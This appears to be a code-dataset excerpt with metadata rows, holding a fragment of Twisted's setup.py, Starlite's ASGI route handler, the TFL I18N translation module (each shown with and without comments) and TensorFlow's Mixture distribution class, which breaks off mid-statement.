arguments["ext_modules"] = extensions
    # Use a custom class to build the extensions.
class my_build_ext(build_ext_twisted):
conditionalExtensions = extensions
command_classes = {
'build_ext': my_build_ext,
}
if sys.version_info[0] >= 3:
command_classes['build_py'] = BuildPy3
requirements = [
"zope.interface >= 4.4.2",
"constantly >= 15.1",
"incremental >= 16.10.1",
"Automat >= 0.3.0",
"hyperlink >= 17.1.1",
# PyHamcrest 1.10.0 is Python 3 only, but lacks package metadata that
# says so. This condition can be dropped when Twisted drops support for
# Python 2.7.
"PyHamcrest >= 1.9.0, != 1.10.0",
"attrs >= 19.2.0",
]
arguments.update(dict(
packages=find_packages("src"),
use_incremental=True,
setup_requires=["incremental >= 16.10.1"],
install_requires=requirements,
entry_points={
'console_scripts': _CONSOLE_SCRIPTS
},
cmdclass=command_classes,
include_package_data=True,
exclude_package_data={
"": ["*.c", "*.h", "*.pxi", "*.pyx", "build.bat"],
},
zip_safe=False,
extras_require=_EXTRAS_REQUIRE,
package_dir={"": "src"},
))
return arguments
class BuildPy3(build_py, object):
def find_package_modules(self, package, package_dir):
modules = [
module for module
in build_py.find_package_modules(self, package, package_dir)
if ".".join([module[0], module[1]]) not in notPortedModules]
return modules
## Helpers and distutils tweaks
class build_ext_twisted(build_ext.build_ext, object):
def prepare_extensions(self):
# always define WIN32 under Windows
if os.name == 'nt':
self.define_macros = [("WIN32", 1)]
else:
self.define_macros = []
# On Solaris 10, we need to define the _XOPEN_SOURCE and
# _XOPEN_SOURCE_EXTENDED macros to build in order to gain access to
# the msg_control, msg_controllen, and msg_flags members in
# sendmsg.c. (according to
# https://stackoverflow.com/questions/1034587). See the documentation
# of X/Open CAE in the standards(5) man page of Solaris.
if sys.platform.startswith('sunos'):
self.define_macros.append(('_XOPEN_SOURCE', 1))
self.define_macros.append(('_XOPEN_SOURCE_EXTENDED', 1))
self.extensions = [
x for x in self.conditionalExtensions if x.condition(self)
]
for ext in self.extensions:
ext.define_macros.extend(self.define_macros)
def build_extensions(self):
self.prepare_extensions()
build_ext.build_ext.build_extensions(self)
def _remove_conftest(self):
for filename in ("conftest.c", "conftest.o", "conftest.obj"):
try:
os.unlink(filename)
except EnvironmentError:
pass
def _compile_helper(self, content):
conftest = open("conftest.c", "w")
try:
with conftest:
conftest.write(content)
try:
self.compiler.compile(["conftest.c"], output_dir='')
except CompileError:
return False
return True
finally:
self._remove_conftest()
def _check_header(self, header_name):
self.compiler.announce("checking for {} ...".format(header_name), 0)
return self._compile_helper("#include <{}>\n".format(header_name))
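    # Illustrative note (not part of the original file): a ConditionalExtension
    # can defer feature detection to build time by calling this helper from its
    # condition callable, e.g. (hypothetical header name):
    #     condition=lambda builder: builder._check_header("sys/epoll.h")
    # The check only works once the compiler object exists, which is why the
    # conditional checks run from build_extensions rather than at import time.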
def _checkCPython(sys=sys, platform=platform):
return platform.python_implementation() == "CPython"
_isCPython = _checkCPython()
notPortedModules = [
"twisted.mail.alias",
"twisted.mail.bounce",
"twisted.mail.mail",
"twisted.mail.maildir",
"twisted.mail.pb",
"twisted.mail.relaymanager",
"twisted.mail.scripts.__init__",
"twisted.mail.tap",
"twisted.mail.test.test_bounce",
"twisted.mail.test.test_mail",
"twisted.mail.test.test_options",
"twisted.mail.test.test_scripts",
"twisted.news.__init__",
"twisted.news.database",
"twisted.news.news",
"twisted.news.nntp",
"twisted.news.tap",
"twisted.news.test.__init__",
"twisted.news.test.test_database",
"twisted.news.test.test_news",
"twisted.news.test.test_nntp",
"twisted.plugins.twisted_mail",
"twisted.plugins.twisted_news",
"twisted.protocols.shoutcast",
"twisted.python.finalize",
"twisted.python.hook",
"twisted.python.test.cmodulepullpipe",
"twisted.python.test.test_pydoctor",
"twisted.python.test.test_win32",
"twisted.test.test_hook",
"twisted.web.soap",
"twisted.web.test.test_soap",
]
| true
| true
|
1c421be8bea10155ae25c22a24e0e3f840106c07
| 1,844
|
py
|
Python
|
starlite/handlers/asgi.py
|
to-ph/starlite
|
8169749468c1fb76c408c9939669e89e18ca6f02
|
[
"MIT"
] | 334
|
2022-01-07T12:14:54.000Z
|
2022-03-30T23:28:03.000Z
|
starlite/handlers/asgi.py
|
to-ph/starlite
|
8169749468c1fb76c408c9939669e89e18ca6f02
|
[
"MIT"
] | 70
|
2022-01-06T18:41:33.000Z
|
2022-03-23T20:21:33.000Z
|
starlite/handlers/asgi.py
|
to-ph/starlite
|
8169749468c1fb76c408c9939669e89e18ca6f02
|
[
"MIT"
] | 24
|
2022-01-06T22:02:01.000Z
|
2022-03-20T01:43:39.000Z
|
from inspect import Signature, iscoroutinefunction
from typing import Any, Dict, List, Optional, Union, cast
from pydantic import validate_arguments
from pydantic.typing import AnyCallable
from starlite.exceptions import ImproperlyConfiguredException
from starlite.handlers.base import BaseRouteHandler
from starlite.types import Guard
class ASGIRouteHandler(BaseRouteHandler):
@validate_arguments(config={"arbitrary_types_allowed": True})
def __init__(
self,
path: Union[Optional[str], Optional[List[str]]] = None,
guards: Optional[List[Guard]] = None,
opt: Optional[Dict[str, Any]] = None,
):
super().__init__(path=path, guards=guards, opt=opt)
def __call__(self, fn: AnyCallable) -> "ASGIRouteHandler":
"""
        Replaces the decorated function with this route handler instance
"""
self.fn = fn
self.validate_handler_function()
return self
def validate_handler_function(self) -> None:
"""
Validates the route handler function once it's set by inspecting its return annotations
"""
super().validate_handler_function()
signature = Signature.from_callable(cast(AnyCallable, self.fn))
if signature.return_annotation is not None:
raise ImproperlyConfiguredException("ASGI handler functions should return 'None'")
if any(key not in signature.parameters for key in ["scope", "send", "receive"]):
raise ImproperlyConfiguredException(
"ASGI handler functions should define 'scope', 'send' and 'receive' arguments"
)
if not iscoroutinefunction(self.fn) and not iscoroutinefunction(self.fn.__call__): # type: ignore[operator]
raise ImproperlyConfiguredException("Functions decorated with 'asgi' must be async functions")
asgi = ASGIRouteHandler
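# A minimal usage sketch (not part of the original module); the handler name,
# path and response below are hypothetical. validate_handler_function above
# requires an async callable that accepts 'scope', 'receive' and 'send' and is
# annotated as returning None.
@asgi(path="/example")
async def example_asgi_handler(scope, receive, send) -> None:
    # Reply with a bare 200 response using the raw ASGI protocol.
    await send({"type": "http.response.start", "status": 200, "headers": []})
    await send({"type": "http.response.body", "body": b"ok"})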
| 38.416667
| 116
| 0.693059
|
from inspect import Signature, iscoroutinefunction
from typing import Any, Dict, List, Optional, Union, cast
from pydantic import validate_arguments
from pydantic.typing import AnyCallable
from starlite.exceptions import ImproperlyConfiguredException
from starlite.handlers.base import BaseRouteHandler
from starlite.types import Guard
class ASGIRouteHandler(BaseRouteHandler):
@validate_arguments(config={"arbitrary_types_allowed": True})
def __init__(
self,
path: Union[Optional[str], Optional[List[str]]] = None,
guards: Optional[List[Guard]] = None,
opt: Optional[Dict[str, Any]] = None,
):
super().__init__(path=path, guards=guards, opt=opt)
def __call__(self, fn: AnyCallable) -> "ASGIRouteHandler":
self.fn = fn
self.validate_handler_function()
return self
def validate_handler_function(self) -> None:
super().validate_handler_function()
signature = Signature.from_callable(cast(AnyCallable, self.fn))
if signature.return_annotation is not None:
raise ImproperlyConfiguredException("ASGI handler functions should return 'None'")
if any(key not in signature.parameters for key in ["scope", "send", "receive"]):
raise ImproperlyConfiguredException(
"ASGI handler functions should define 'scope', 'send' and 'receive' arguments"
)
if not iscoroutinefunction(self.fn) and not iscoroutinefunction(self.fn.__call__):
raise ImproperlyConfiguredException("Functions decorated with 'asgi' must be async functions")
asgi = ASGIRouteHandler
| true
| true
|
1c421c084e646eb6b6d1dc10ae2a6dceda689c38
| 9,411
|
py
|
Python
|
venv/Lib/site-packages/_TFL/I18N.py
|
nasir733/airbnb-clone
|
9ac746b6f3f3c8fc45f97773266e6f5f182d14b9
|
[
"MIT"
] | 6
|
2016-12-10T17:51:10.000Z
|
2021-10-11T07:51:48.000Z
|
venv/Lib/site-packages/_TFL/I18N.py
|
nasir733/airbnb-clone
|
9ac746b6f3f3c8fc45f97773266e6f5f182d14b9
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/_TFL/I18N.py
|
nasir733/airbnb-clone
|
9ac746b6f3f3c8fc45f97773266e6f5f182d14b9
|
[
"MIT"
] | 3
|
2020-03-29T07:37:03.000Z
|
2021-01-21T16:08:40.000Z
|
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2019 Mag. Christian Tanzer. All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# TFL.I18N
#
# Purpose
# Support for internationalization (I18N)
#
# Revision Dates
# 28-Oct-2009 (CT) Creation
# 19-Jan-2010 (CT) `_Tn` changed to make `plural` and `n` optional
# 21-Jan-2010 (MG) Real translation added
# 21-Jan-2010 (CT) Module-level aliases added, `I18N.ungettext` corrected
# 21-Jan-2010 (CT) `load_languages` and `use_language` added
# 21-Jan-2010 (MG) Reworked
# 21-Jan-2010 (MG) `save_eval` added
# 25-Jan-2010 (MG) Support list of languages in `use` and `context`
# 31-Jan-2010 (CT) `import babel.support` moved inside functions
# 18-Feb-2010 (CT) `Name` added
# 22-Feb-2010 (CT) `choose` factored, `Config.choice` added
# 15-Apr-2010 (MG) `Translations` added and used
# 16-Jun-2010 (CT) `encoding` added
# 16-Jun-2010 (CT) `encoding` changed to Record with fields `file_system`,
# `input`, and `output`
# 16-Jun-2010 (CT) s/print/pyk.fprint/
# 17-Jun-2010 (CT) `encode_f` and `encode_o` added
# 18-Jun-2010 (CT) `Translations` factored to `TFL.Babel`
# 18-Jun-2010 (CT) `decode` added
# 4-Aug-2010 (MG) `load`: `log_level` added
# 30-Nov-2010 (CT) s/save_eval/safe_eval/ and removed `strip`-call from it
# 23-Mar-2011 (CT) `_T` defined (instead of aliased) to guard against
# empty argument
# 20-Jul-2011 (CT) `_Config_._properties` added
# 20-Jul-2011 (CT) Use encoding information from `TFL.user_config`
# 4-Dec-2013 (CT) Change `safe_eval` to not add coding cookie;
# `eval` fails for `unicode` value containing coding cookie
# 9-Dec-2013 (CT) Fix 3-compatibility
# 26-Mar-2014 (CT) Change `ungettext` to use `ugettext` for `n == 1`
# 31-Mar-2014 (CT) Add guard for `AttributeError` to `ugettext`, `ungettext`
# (3-compatibility for `gettext.NullTranslations`)
# 31-Mar-2014 (CT) Use `print` in doctest of `context` (3-compatibility)
# 8-Oct-2015 (CT) Change `__getattr__` to *not* handle `__XXX__`
# 11-Feb-2016 (CT) Add `test_language`
# 9-Dec-2019 (CT) Change `decode` to use `pyk.decoded`, not home-grown code
# * Python 3 compatibility
# ««revision-date»»···
#--
from _TFL import TFL
from _TFL.pyk import pyk
from _TFL.Record import Record
from _TFL.predicate import first, split_hst
import _TFL.Decorator
import _TFL.User_Config
import gettext
import locale
import sys
class _Config_ (Record) :
_properties = ("choice", )
@property
def choice (self) :
"""Language choice."""
return TFL.user_config.language
# end def choice
@choice.setter
def choice (self, value) :
TFL.user_config.language = value
# end def choice
# end class _Config_
Config = _Config_ \
( Languages = {"" : gettext.NullTranslations ()}
, locale_dir = "locale"
, domains = ("messages", )
)
Config.current = Config.Null = Config.Languages [""]
class _Name_ (TFL.Meta.Object) :
"""Translator for names"""
def __getattr__ (self, name) :
if name.startswith ("__") and name.endswith ("__") :
### Placate inspect.unwrap of Python 3.5,
### which accesses `__wrapped__` and eventually throws `ValueError`
return getattr (self.__super, name)
return _T (name)
# end def __getattr__
def __getitem__ (self, key) :
return _T (key)
# end def __getitem__
# end class _Name_
def add (self, * languages, ** kw) :
locale_dir = kw.pop ("locale_dir", Config.locale_dir)
domains = kw.pop ("domains", Config.domains)
use_lang = kw.pop ("use", "")
_load_languages (locale_dir, languages, domains)
if use_lang :
use (use_lang)
# end def add
def choose (* lang) :
def _gen (lang) :
for l in lang :
yield l, l
for l in lang :
if l :
a, _, b = split_hst (l, "_")
yield a, b or a
yield "", ""
return first (l for l in _gen (lang) if l [0] in Config.Languages)
# end def choose
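### Illustrative sketch (not part of the original module): `choose` prefers an
### exact match, then the bare language code, then the null translation "".
### With only a (hypothetical) "de" catalog registered:
### >>> Config.Languages.setdefault ("de", gettext.NullTranslations ())
### >>> choose ("de_AT", "en")
### ('de', 'AT')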
@TFL.Contextmanager
def context (* lang) :
"""Temporarily change the translation language
### Let's fake some Translations
>>> from _TFL._Babel.Translations import Translations
>>> Config.Languages ["l1"] = l1 = Translations ()
>>> Config.Languages ["l2"] = l2 = Translations ()
>>> l1._catalog = dict (text1 = u"L1: Text 1", text2 = u"L1: Text 2")
>>> l2._catalog = dict (text1 = u"L2: Text 1", text2 = u"L2: Text 2")
>>> print (_T ("text1"))
text1
>>> with context ("l1") :
... print (_T ("text1"))
... print (_T ("text2"))
L1: Text 1
L1: Text 2
>>> with context ("l2") :
... print (_T ("text1"))
... print (_T ("text2"))
L2: Text 1
L2: Text 2
"""
old = Config.current, Config.choice
try :
use (* lang)
yield
finally :
Config.current, Config.choice = old
# end def context
def decode (s) :
"""Decode `s` using `TFL.user_config.input_encoding`."""
s = pyk.decoded (s, TFL.user_config.input_encoding)
return s
# end def decode
def encode_f (s, errors = "replace") :
"""Encodes `s` using `TFL.user_config.file_system_encoding`."""
return s.encode (TFL.user_config.file_system_encoding, errors)
# end def encode_f
def encode_o (s, errors = "replace") :
"""Encodes `s` using `TFL.user_config.output_encoding`."""
return s.encode (TFL.user_config.output_encoding, errors)
# end def encode_o
def load (* languages, ** kw) :
locale_dir = kw.pop ("locale_dir", Config.locale_dir)
domains = kw.pop ("domains", Config.domains)
use_lang = kw.pop ("use", "")
log_level = kw.pop ("log_level", 5)
Config.domains = domains
Config.locale_dir = locale_dir
_load_languages (locale_dir, languages, domains, log_level)
if use_lang:
use (use_lang)
# end def load
def _load_languages (locale_dir, languages, domains, log_level) :
from _TFL._Babel.Translations import Translations
if not isinstance (domains, (list, tuple)) :
domains = (domains, )
first_dom = domains [0]
domains = domains [1:]
for lang in languages :
Config.Languages [lang] = lang_trans = Translations.load \
(locale_dir, lang, first_dom)
if not isinstance (lang_trans, Translations) and log_level >= 5 :
print \
( "*** Warning, language %s for domain %s not found!"
% (lang, first_dom)
)
for d in domains :
new_domain = Translations.load (locale_dir, lang, d)
if not isinstance (new_domain, Translations) and log_level >= 5 :
print \
( "*** Warning, language %s for domain %s not found!"
% (lang, d)
)
lang_trans.merge (new_domain)
# end def _load_languages
def mark (text):
"""Mark `text` for translation."""
return str (text)
# end def mark
def safe_eval (value, encoding = None) :
if encoding and not isinstance (value, str) :
try :
value = value.decode (encoding)
except Exception as exc :
print (repr (value), encoding)
raise
try :
result = TFL.r_eval (value)
except SyntaxError :
print (value)
raise
return result
# end def safe_eval
@TFL.Contextmanager
def test_language (lang) :
"""Load and use language `lang` from `locale` in library directory."""
from _TFL.sos import path
ld = path.join \
(path.abspath (path.dirname (path.dirname (__file__))), "locale")
load (lang, locale_dir = ld)
with context (lang) :
yield
# end def test_language
def ugettext (text, trans = None) :
"""Return the localized translation of `text` (as unicode)."""
try :
translator = (trans or Config.current).ugettext
except AttributeError :
return text
else :
return translator (text)
# end def ugettext
def ungettext (singular, plural = None, n = 99, trans = None) :
"""Return the localized translation of `singular/plural` for the plural form
appropriate for `n` (as unicode).
"""
if n == 1 :
return ugettext (singular, trans)
else :
if plural is None :
plural = singular + "s"
try :
translator = (trans or Config.current).ungettext
except AttributeError :
return plural
else :
return translator (singular, plural, n)
# end def ungettext
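### Illustrative sketch (not part of the original module): with no catalog
### loaded, `ungettext` falls back to the untranslated forms, deriving a
### default plural by appending "s" when none is given.
### >>> ungettext ("file", "files", 1)
### 'file'
### >>> ungettext ("file", n = 3)
### 'files'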
def use (* lang) :
Config.choice = (l, v) = choose (* lang)
Config.current = Config.Languages [l]
# end def use
_ = mark
def _T (s) :
if s :
return ugettext (s)
return s
# end def _T
_Tn = ungettext
Name = _Name_ ()
if __name__ != "__main__" :
TFL._Export_Module ()
### __END__ TFL.I18N
| 32.340206
| 80
| 0.592817
|
from _TFL import TFL
from _TFL.pyk import pyk
from _TFL.Record import Record
from _TFL.predicate import first, split_hst
import _TFL.Decorator
import _TFL.User_Config
import gettext
import locale
import sys
class _Config_ (Record) :
_properties = ("choice", )
@property
def choice (self) :
return TFL.user_config.language
@choice.setter
def choice (self, value) :
TFL.user_config.language = value
Config = _Config_ \
( Languages = {"" : gettext.NullTranslations ()}
, locale_dir = "locale"
, domains = ("messages", )
)
Config.current = Config.Null = Config.Languages [""]
class _Name_ (TFL.Meta.Object) :
def __getattr__ (self, name) :
if name.startswith ("__") and name.endswith ("__") :
            return getattr (self.__super, name)
        return _T (name)
    def __getitem__ (self, key) :
        return _T (key)
def add (self, * languages, ** kw) :
    locale_dir = kw.pop      ("locale_dir", Config.locale_dir)
domains = kw.pop ("domains", Config.domains)
use_lang = kw.pop ("use", "")
_load_languages (locale_dir, languages, domains)
if use_lang :
use (use_lang)
def choose (* lang) :
def _gen (lang) :
for l in lang :
yield l, l
for l in lang :
if l :
a, _, b = split_hst (l, "_")
yield a, b or a
yield "", ""
return first (l for l in _gen (lang) if l [0] in Config.Languages)
@TFL.Contextmanager
def context (* lang) :
old = Config.current, Config.choice
try :
use (* lang)
yield
finally :
Config.current, Config.choice = old
def decode (s) :
s = pyk.decoded (s, TFL.user_config.input_encoding)
return s
def encode_f (s, errors = "replace") :
return s.encode (TFL.user_config.file_system_encoding, errors)
def encode_o (s, errors = "replace") :
return s.encode (TFL.user_config.output_encoding, errors)
def load (* languages, ** kw) :
locale_dir = kw.pop ("locale_dir", Config.locale_dir)
domains = kw.pop ("domains", Config.domains)
use_lang = kw.pop ("use", "")
log_level = kw.pop ("log_level", 5)
Config.domains = domains
Config.locale_dir = locale_dir
_load_languages (locale_dir, languages, domains, log_level)
if use_lang:
use (use_lang)
def _load_languages (locale_dir, languages, domains, log_level) :
from _TFL._Babel.Translations import Translations
if not isinstance (domains, (list, tuple)) :
domains = (domains, )
first_dom = domains [0]
domains = domains [1:]
for lang in languages :
Config.Languages [lang] = lang_trans = Translations.load \
(locale_dir, lang, first_dom)
if not isinstance (lang_trans, Translations) and log_level >= 5 :
print \
( "*** Warning, language %s for domain %s not found!"
% (lang, first_dom)
)
for d in domains :
new_domain = Translations.load (locale_dir, lang, d)
if not isinstance (new_domain, Translations) and log_level >= 5 :
print \
( "*** Warning, language %s for domain %s not found!"
% (lang, d)
)
lang_trans.merge (new_domain)
def mark (text):
return str (text)
def safe_eval (value, encoding = None) :
if encoding and not isinstance (value, str) :
try :
value = value.decode (encoding)
except Exception as exc :
print (repr (value), encoding)
raise
try :
result = TFL.r_eval (value)
except SyntaxError :
print (value)
raise
return result
@TFL.Contextmanager
def test_language (lang) :
from _TFL.sos import path
ld = path.join \
(path.abspath (path.dirname (path.dirname (__file__))), "locale")
load (lang, locale_dir = ld)
with context (lang) :
yield
def ugettext (text, trans = None) :
try :
translator = (trans or Config.current).ugettext
except AttributeError :
return text
else :
return translator (text)
def ungettext (singular, plural = None, n = 99, trans = None) :
if n == 1 :
return ugettext (singular, trans)
else :
if plural is None :
plural = singular + "s"
try :
translator = (trans or Config.current).ungettext
except AttributeError :
return plural
else :
return translator (singular, plural, n)
def use (* lang) :
Config.choice = (l, v) = choose (* lang)
Config.current = Config.Languages [l]
_ = mark
def _T (s) :
if s :
return ugettext (s)
return s
_Tn = ungettext
Name = _Name_ ()
if __name__ != "__main__" :
TFL._Export_Module ()
| true
| true
|
1c421c8fa09d98cc032788271130bc9b9f3fb194
| 17,010
|
py
|
Python
|
tensorflow/contrib/distributions/python/ops/mixture.py
|
gnoses/TensorFlow
|
63a21e054007d86269ed1ad0145ebce04ee57a81
|
[
"Apache-2.0"
] | 1
|
2017-02-24T05:09:40.000Z
|
2017-02-24T05:09:40.000Z
|
tensorflow/contrib/distributions/python/ops/mixture.py
|
gnoses/TensorFlow
|
63a21e054007d86269ed1ad0145ebce04ee57a81
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/distributions/python/ops/mixture.py
|
gnoses/TensorFlow
|
63a21e054007d86269ed1ad0145ebce04ee57a81
|
[
"Apache-2.0"
] | 1
|
2021-02-16T15:38:50.000Z
|
2021-02-16T15:38:50.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Mixture distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import categorical
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
class Mixture(distribution.Distribution):
"""Mixture distribution.
The `Mixture` object implements batched mixture distributions.
The mixture model is defined by a `Categorical` distribution (the mixture)
and a python list of `Distribution` objects.
Methods supported include `log_prob`, `prob`, `mean`, `sample`, and
`entropy_lower_bound`.
"""
def __init__(self,
cat,
components,
validate_args=False,
allow_nan_stats=True,
name="Mixture"):
"""Initialize a Mixture distribution.
A `Mixture` is defined by a `Categorical` (`cat`, representing the
mixture probabilities) and a list of `Distribution` objects
all having matching dtype, batch shape, event shape, and continuity
properties (the components).
The `num_classes` of `cat` must be possible to infer at graph construction
time and match `len(components)`.
Args:
cat: A `Categorical` distribution instance, representing the probabilities
of `distributions`.
components: A list or tuple of `Distribution` instances.
Each instance must have the same type, be defined on the same domain,
and have matching `event_shape` and `batch_shape`.
validate_args: Python `bool`, default `False`. If `True`, raise a runtime
error if batch or event ranks are inconsistent between cat and any of
the distributions. This is only checked if the ranks cannot be
determined statically at graph construction time.
allow_nan_stats: Boolean, default `True`. If `False`, raise an
exception if a statistic (e.g. mean/mode/etc...) is undefined for any
batch member. If `True`, batch members with valid parameters leading to
undefined statistics will return NaN for this statistic.
name: A name for this distribution (optional).
Raises:
TypeError: If cat is not a `Categorical`, or `components` is not
a list or tuple, or the elements of `components` are not
instances of `Distribution`, or do not have matching `dtype`.
ValueError: If `components` is an empty list or tuple, or its
elements do not have a statically known event rank.
If `cat.num_classes` cannot be inferred at graph creation time,
or the constant value of `cat.num_classes` is not equal to
`len(components)`, or all `components` and `cat` do not have
matching static batch shapes, or all components do not
have matching static event shapes.
"""
parameters = locals()
if not isinstance(cat, categorical.Categorical):
raise TypeError("cat must be a Categorical distribution, but saw: %s" %
cat)
if not components:
raise ValueError("components must be a non-empty list or tuple")
if not isinstance(components, (list, tuple)):
raise TypeError("components must be a list or tuple, but saw: %s" %
components)
if not all(isinstance(c, distribution.Distribution) for c in components):
raise TypeError(
"all entries in components must be Distribution instances"
" but saw: %s" % components)
dtype = components[0].dtype
if not all(d.dtype == dtype for d in components):
raise TypeError("All components must have the same dtype, but saw "
"dtypes: %s" % [(d.name, d.dtype) for d in components])
is_continuous = components[0].is_continuous
if not all(d.is_continuous == is_continuous for d in components):
raise TypeError(
"All components must either be continuous or not, but continuity "
"values are: %s" % [(d.name, d.is_continuous) for d in components])
static_event_shape = components[0].event_shape
static_batch_shape = cat.batch_shape
for d in components:
static_event_shape = static_event_shape.merge_with(d.event_shape)
static_batch_shape = static_batch_shape.merge_with(d.batch_shape)
if static_event_shape.ndims is None:
raise ValueError(
"Expected to know rank(event_shape) from components, but "
"none of the components provide a static number of ndims")
# Ensure that all batch and event ndims are consistent.
with ops.name_scope(name, values=[cat.logits]) as ns:
num_components = cat.event_size
static_num_components = tensor_util.constant_value(num_components)
if static_num_components is None:
raise ValueError(
"Could not infer number of classes from cat and unable "
"to compare this value to the number of components passed in.")
# Possibly convert from numpy 0-D array.
static_num_components = int(static_num_components)
if static_num_components != len(components):
raise ValueError("cat.num_classes != len(components): %d vs. %d" %
(static_num_components, len(components)))
cat_batch_shape = cat.batch_shape_tensor()
cat_batch_rank = array_ops.size(cat_batch_shape)
if validate_args:
batch_shapes = [d.batch_shape_tensor() for d in components]
batch_ranks = [array_ops.size(bs) for bs in batch_shapes]
check_message = ("components[%d] batch shape must match cat "
"batch shape")
self._assertions = [
check_ops.assert_equal(
cat_batch_rank, batch_ranks[di], message=check_message % di)
for di in range(len(components))
]
self._assertions += [
check_ops.assert_equal(
cat_batch_shape, batch_shapes[di], message=check_message % di)
for di in range(len(components))
]
else:
self._assertions = []
self._cat = cat
self._components = list(components)
self._num_components = static_num_components
self._static_event_shape = static_event_shape
self._static_batch_shape = static_batch_shape
# We let the Mixture distribution access _graph_parents since its arguably
# more like a baseclass.
graph_parents = self._cat._graph_parents # pylint: disable=protected-access
for c in self._components:
graph_parents += c._graph_parents # pylint: disable=protected-access
super(Mixture, self).__init__(
dtype=dtype,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
is_continuous=is_continuous,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=graph_parents,
name=ns)
@property
def cat(self):
return self._cat
@property
def components(self):
return self._components
@property
def num_components(self):
return self._num_components
def _batch_shape_tensor(self):
return self._cat.batch_shape_tensor()
def _batch_shape(self):
return self._static_batch_shape
def _event_shape_tensor(self):
return self._components[0].event_shape_tensor()
def _event_shape(self):
return self._static_event_shape
def _mean(self):
with ops.control_dependencies(self._assertions):
distribution_means = [d.mean() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
# This was checked to not be None at construction time.
static_event_rank = self.event_shape.ndims
# Expand the rank of x up to static_event_rank times so that
# broadcasting works correctly.
def expand(x):
expanded_x = x
for _ in range(static_event_rank):
expanded_x = array_ops.expand_dims(expanded_x, -1)
return expanded_x
cat_probs = [expand(c_p) for c_p in cat_probs]
partial_means = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_means)
]
# These should all be the same shape by virtue of matching
# batch_shape and event_shape.
return math_ops.add_n(partial_means)
def _log_prob(self, x):
with ops.control_dependencies(self._assertions):
x = ops.convert_to_tensor(x, name="x")
distribution_log_probs = [d.log_prob(x) for d in self.components]
cat_log_probs = self._cat_probs(log_probs=True)
final_log_probs = [
cat_lp + d_lp
for (cat_lp, d_lp) in zip(cat_log_probs, distribution_log_probs)
]
concat_log_probs = array_ops.stack(final_log_probs, 0)
log_sum_exp = math_ops.reduce_logsumexp(concat_log_probs, [0])
return log_sum_exp
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _sample_n(self, n, seed=None):
with ops.control_dependencies(self._assertions):
n = ops.convert_to_tensor(n, name="n")
static_n = tensor_util.constant_value(n)
n = int(static_n) if static_n is not None else n
cat_samples = self.cat.sample(n, seed=seed)
static_samples_shape = cat_samples.get_shape()
if static_samples_shape.is_fully_defined():
samples_shape = static_samples_shape.as_list()
samples_size = static_samples_shape.num_elements()
else:
samples_shape = array_ops.shape(cat_samples)
samples_size = array_ops.size(cat_samples)
static_batch_shape = self.batch_shape
if static_batch_shape.is_fully_defined():
batch_shape = static_batch_shape.as_list()
batch_size = static_batch_shape.num_elements()
else:
batch_shape = self.batch_shape_tensor()
        batch_size = math_ops.reduce_prod(batch_shape)
static_event_shape = self.event_shape
if static_event_shape.is_fully_defined():
event_shape = np.array(static_event_shape.as_list(), dtype=np.int32)
else:
event_shape = self.event_shape_tensor()
# Get indices into the raw cat sampling tensor. We will
# need these to stitch sample values back out after sampling
# within the component partitions.
samples_raw_indices = array_ops.reshape(
math_ops.range(0, samples_size), samples_shape)
# Partition the raw indices so that we can use
# dynamic_stitch later to reconstruct the samples from the
# known partitions.
partitioned_samples_indices = data_flow_ops.dynamic_partition(
data=samples_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
# Copy the batch indices n times, as we will need to know
# these to pull out the appropriate rows within the
# component partitions.
batch_raw_indices = array_ops.reshape(
array_ops.tile(math_ops.range(0, batch_size), [n]), samples_shape)
# Explanation of the dynamic partitioning below:
# batch indices are i.e., [0, 1, 0, 1, 0, 1]
# Suppose partitions are:
# [1 1 0 0 1 1]
# After partitioning, batch indices are cut as:
# [batch_indices[x] for x in 2, 3]
# [batch_indices[x] for x in 0, 1, 4, 5]
# i.e.
# [1 1] and [0 0 0 0]
# Now we sample n=2 from part 0 and n=4 from part 1.
# For part 0 we want samples from batch entries 1, 1 (samples 0, 1),
# and for part 1 we want samples from batch entries 0, 0, 0, 0
# (samples 0, 1, 2, 3).
partitioned_batch_indices = data_flow_ops.dynamic_partition(
data=batch_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
samples_class = [None for _ in range(self.num_components)]
for c in range(self.num_components):
n_class = array_ops.size(partitioned_samples_indices[c])
seed = distribution_util.gen_new_seed(seed, "mixture")
samples_class_c = self.components[c].sample(n_class, seed=seed)
# Pull out the correct batch entries from each index.
# To do this, we may have to flatten the batch shape.
# For sample s, batch element b of component c, we get the
# partitioned batch indices from
# partitioned_batch_indices[c]; and shift each element by
# the sample index. The final lookup can be thought of as
# a matrix gather along locations (s, b) in
# samples_class_c where the n_class rows correspond to
# samples within this component and the batch_size columns
# correspond to batch elements within the component.
#
# Thus the lookup index is
# lookup[c, i] = batch_size * s[i] + b[c, i]
# for i = 0 ... n_class[c] - 1.
lookup_partitioned_batch_indices = (
batch_size * math_ops.range(n_class) +
partitioned_batch_indices[c])
samples_class_c = array_ops.reshape(
samples_class_c,
